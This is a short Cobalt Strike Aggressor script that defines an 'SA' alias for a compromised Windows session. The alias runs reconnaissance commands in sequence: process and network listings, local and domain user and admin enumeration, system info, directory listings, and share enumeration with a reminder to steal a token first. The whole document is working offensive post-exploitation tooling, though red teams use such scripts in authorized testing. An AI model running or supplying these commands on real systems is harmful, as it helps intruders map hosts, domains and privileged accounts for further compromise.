# Basic Situational Awarness checks on Windows systems; load and type SA in CS session.
alias SA {
	btask($1, "\c9\Situational Awarness target checks!");
	bps($1);   #list processes
	bshell!($1, "echo \c8\Ipconfig && ipconfig /all");
	bshell!($1, "echo \c8\Connections && netstat -anop tcp");
	bpause!($1, int(120));
	bshell!($1, "echo \c8\Local Users && net users");
	bshell!($1, "echo \c8\Local Admins && net localgroup administrators");
	bshell!($1, "echo \c8\Get Domain Info && wmic computersystem get domain");
	bshell!($1, "echo \c8\Domain Accounts && net accounts /domain");
	bpause!($1, int(120));	
	bshell!($1, "echo \c8\Domain Admins && net groups \"domain admins\" /domain");
	bshell!($1, "echo \c8\WMIC Processes && WMIC PATH win32_process GET Processid,Commandline");
	bshell!($1, "echo \c8\System Info && systeminfo | findstr /B /C:\"OS Name\" /C:\"OS Version\" /C:\"System Type\" /C:\"System Boot Time\"");
	bshell!($1, "echo \c8\Enum C:\ && dir c:\\ && dir c:\\Users");
	bshell!($1, "echo \c8\Share Drive **Steal Token 1st** && net use");

}